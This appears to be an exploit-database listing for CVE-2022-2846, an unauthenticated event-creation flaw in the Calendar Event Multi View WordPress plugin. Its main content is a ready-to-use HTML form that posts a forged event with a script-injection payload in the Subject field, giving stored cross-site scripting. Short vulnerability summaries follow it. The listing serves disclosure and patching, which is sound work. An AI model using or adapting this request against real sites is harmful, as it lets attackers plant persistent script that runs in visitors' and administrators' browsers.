Headline
Calendar Event Multi View 1.4.07 Cross Site Scripting
Calendar Event Multi View version 1.4.07 suffers from a cross site scripting vulnerability.
# Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)# Date: 2022-05-25# Exploit Author: Mostafa Farzaneh# WPScan page:https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c# Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/# Software Link:https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip# Version: 1.4.06# Tested on: Linux# CVE : CVE-2022-2846# Description:The Calendar Event Multi View WordPress plugin before 1.4.07 does not haveany authorisation and CSRF checks in place when creating an event, and isalso lacking sanitisation as well as escaping in some of the event fields.This could allow unauthenticated attackers to create arbitrary events andput Cross-Site Scripting payloads in it.#POC and exploit code:As an unauthenticated user, to add a malicious event (on October 6th, 2022)to the calendar with ID 1, open the code below<html> <body> <form action="https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails"method="POST"> <input type="hidden" name="Subject"value='"><script>alert(/XSS/)</script>' /> <input type="hidden" name="colorvalue" value="#f00" /> <input type="hidden" name="rrule" value="" /> <input type="hidden" name="rruleType" value="" /> <input type="hidden" name="stpartdate" value="10/6/2022" /> <input type="hidden" name="stparttime" value="00:00" /> <input type="hidden" name="etpartdate" value="10/6/2022" /> <input type="hidden" name="etparttime" value="00:00" /> <input type="hidden" name="stpartdatelast" value="10/6/2022" /> <input type="hidden" name="etpartdatelast" value="10/6/2022" /> <input type="hidden" name="stparttimelast" value="" /> <input type="hidden" name="etparttimelast" value="" /> <input type="hidden" name="IsAllDayEvent" value="1" /> <input type="hidden" name="Location" value="CSRF" /> <input type="hidden" name="Description" value='<p style="text-align:left;">CSRF</p>' /> <input type="hidden" name="timezone" value="4.5" /> <input type="submit" value="Submit request" /> </form> </body></html>The XSS will be triggered when viewing the related eventRelated news
The Calendar Event Multi View WordPress plugin before 1.4.07 does not have any authorisation and CSRF checks in place when creating an event, and is also lacking sanitisation as well as escaping in some of the event fields. This could allow unauthenticated attackers to create arbitrary events and put Cross-Site Scripting payloads in it.
A vulnerability classified as problematic was found in Calendar Event Multi View Plugin. This vulnerability affects unknown code of the file /wp/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=1&method=adddetails&id=2. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The identifier of this vulnerability is VDB-206488.